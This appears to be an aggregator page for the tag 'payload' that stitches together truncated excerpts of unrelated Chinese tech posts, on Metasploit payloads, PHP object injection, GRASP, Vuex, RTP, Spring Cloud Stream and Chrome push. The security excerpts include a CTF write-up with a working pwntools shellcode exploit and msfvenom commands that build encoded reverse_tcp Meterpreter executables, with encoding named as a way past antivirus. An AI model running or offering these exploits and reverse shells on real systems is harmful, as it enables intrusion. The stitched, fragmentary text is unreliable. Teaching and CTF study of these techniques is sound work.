payload

MSF——Payload模块(二)

谁说胖子不能爱 提交于 2019-12-28 02:01:35
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload ,payload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的payload上 在使用exploit时,我们都是用 use 去使用的,在exploit模块中,我们可以 set 调用各种payload 如果我们不想使用exploit,而是直接使用payload,我们也可以直接用 use 使用一个payload 一样可以通过show options查看有哪些参数需要设置 这里的 RHOST是指受害机器只接受某个远程主机来连接它的4444端口(4444是受害机器开放的端口) ,限制了来源IP,我们这里可以不用设置。但是如果被其他人扫到这个端口,他们也可以连接上去获得shell。 二、直接使用payload 一般我们是在exploit中调用payload,如果想直接使用payload,可以使用 generate 命令来生成payload。 如下图所示

PHP字符逃逸导致的对象注入详解

只谈情不闲聊 提交于 2019-12-27 04:00:40
1.漏洞产生原因: 序列化的字符串在经过过滤函数不正确的处理而导致对象注入,目前看到都是因为过滤函数放在了serialize函数之后,要是放在序列化之前应该就不会产生这个问题 <?php function filter ( $string ) { $a = str_replace ( 'x' , 'zz' , $string ) ; return $a ; } $username = "tr1ple" ; $password = "aaaaax" ; $user = array ( $username , $password ) ; echo ( serialize ( $user ) ) ; echo "\n" ; $r = filter ( serialize ( $user ) ) ; echo ( $r ) ; echo "\n" ; var_dump ( unserialize ( $r ) ) ; $a = 'a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";' ; var_dump ( unserialize ( $a ) ) ; php特性: 1.PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 2.对类中不存在的属性也会进行反序列化

GRASP软件职责分配原则

冷暖自知 提交于 2019-12-27 03:41:48
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> GRASP是General Responsibility Assignment Software Pattern的缩写,是一组为软件对象分配职责的指导原则。GRASP包含9种模式,它们是: 创建者(Creator) 信息专家(Information Expert) 低耦合(Low Coupling) 高内聚(High Cohesion) 控制器(Controller) 多态(Polymorphism) 纯虚构(Pure Fabrication) 间接性(Indirection) 防止变异(Protected Variation) 下面逐一介绍这9种模式。 1 创建者 创建者模式用于指导创建对象职责的分配。假设有两个类A和B,并且下列条件之一得到满足,那么应当将创建A类实例对象的职责分配给B类。 B包含A,或者由A聚合而成。 B记录A。 B紧密的使用A。 B具有初始化A的初始化所需要的数据。 创建者模式的优点是可以降低耦合。下面是创建者模式的示例。 // 示例:创建者 // MessageBuilder具有初始化Message所需要的数据,因此将创建Message的职责分配给MessageBuilder。 public class MessageBuilder { private String

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

蹲街弑〆低调 提交于 2019-12-26 18:57:56
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai

Vue 状态集中管理vuex

…衆ロ難τιáo~ 提交于 2019-12-25 19:41:48
1、store ==>index.js import Vue from 'vue' import Vuex from 'vuex' import types from './types' //// mutations的函数名放在这个文件里 import taskManage from './modules/taskManage' Vue.use(Vuex); export default new Vuex.Store ({ types, modules: { taskManage }, }); 2、main.js import Vue from 'vue'; import App from './App.vue'; import store from './store'; new Vue({ store, render: h => h(App), }).$mount('#app'); 3、types.js // mutations的函数名放在这个文件里, 可有可无 export const SET_INFO = 'SET_INFO' 4、modules ==> taskManage.js // 主要逻辑写这 import { SET_INFO } from '../types' import { getInfo } from '@api' // 数据接口 // vuex中的数据源

How can I decode rtp packet of some specific rtp payload type as rtp packet with another payload type?

最后都变了- 提交于 2019-12-24 23:23:10
问题 I'm receiving rtp packets with JPEG payload with VLC. When I mannually setup the type to 26 (JPEG), vlc doesn't try open the stream; if I define it as 96, vlc opens it and displays it wrong - that is due to malformed encoding. To find out the correct encoding, i.e to find out what values of packet headers are correct, i want to compare the rtp packets with working example. Surprisingly, example uses payload type 96 instead of 26. I user wireshark to observe the headres; if works fine with

【二进制】CTF-Wiki PWN里面的一些练习题(Basic-ROP篇)

拜拜、爱过 提交于 2019-12-24 20:31:16
sniperoj-pwn100-shellcode-x86-64 23 字节 shellcode "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" 首先根据 gdb 确定偏移,然后把因为有个 leave 指令会破坏前面的,所以前面的填充为脏数据,然后加上返回地址占据的 8 位空间,确定在 buf_addr 后面 24+8 填充 shellcode from pwn import * sh = process('./shellcode') shellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" sh.recvuntil('[') buf_addr = sh.recvuntil(']', drop=True) buf_addr = int(buf_addr, 16) payload = 'b' * 24 + p64(buf_addr + 32) + shellcode_x64 print payload sh.sendline(payload) sh.interactive()

第十八章——内网渗透之域渗透

柔情痞子 提交于 2019-12-24 12:00:36
渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持! MSF 在讲域渗透之前,先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网 批量扫描 ms17-010 ●针对域成员 08R2 msf渗透 并提权 要点:针对对方是x64的架构 生成一个x64的反弹shell的exe文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.145 LPORT=6666 -f exe -o shell.exe 可以利用这个模块配合提权multi/recon/local_exploit_suggester 关于msfvenom生成木马: 参数: -p 指定要使用的 msf 的 payload,也可以使用自定义 payload。 -l 列出所有可用的所有可用资源. 模块类型包括: payloads, encoders, nops等。 -n 为 payload 预先指定一个 NOP 滑动长度(一切为了绕过防火墙与免杀)。 -f 指定 payload 输出的文件类型,–help-formats,可查看支持的所有输出格式(默认的输出格式是 raw,直接输出 payload 的字符

Spring Cloud Stream 入门

浪尽此生 提交于 2019-12-24 03:18:58
Spring Cloud Stream 入门 使用 docker 启动 rabbitmq 这里注意获取镜像的时候要获取management版本的,不要获取last版本的,management版本的才带有管理界面。 启动 rabbitmq docker pull docker.io/rabbitmq:3.8-management docker run --name rabbitmq -d -p 15672:15672 -p 5672:5672 rabbitmq:3.8-management --name 指定了容器名称 -d 指定容器以后台守护进程方式运行 -p 指定容器内部端口号与宿主机之间的映射,rabbitMq默认要使用15672为其web端界面访问时端口,5672为数据通信端口 rabbitmq 用户角色权限操作 默认的guest 账户有访问限制,默认只能通过本地网络(如 localhost) 访问,远程网络访问受限,所以在使用时我们一般另外添加用户,例如我们添加一个root用户: # 1. 进入容器 docker exec -it rabbitmq bash # 2. 添加 root 用户 rabbitmqctl add_user root 123456 # 3. 赋予 root 用户所有权限 rabbitmqctl set_permissions -p / root ".

google gcm “raw_data” payload for desktop chrome 50 beta

余生颓废 提交于 2019-12-24 01:15:31
问题 I am trying to send a and read message payload using the google GCM mechanism. To send the data I am using the instructions found under "Web Push" in: https://developers.google.com/web/updates/2016/03/web-push-encryption?hl=en where it is instructed, that until full support by chrome is available, the payload can be sent using "raw_data" which needs to be base64 encripted. to display the data I am ussing chorome 50Beta, since it is supposed to support payloads. but when the 'push' event is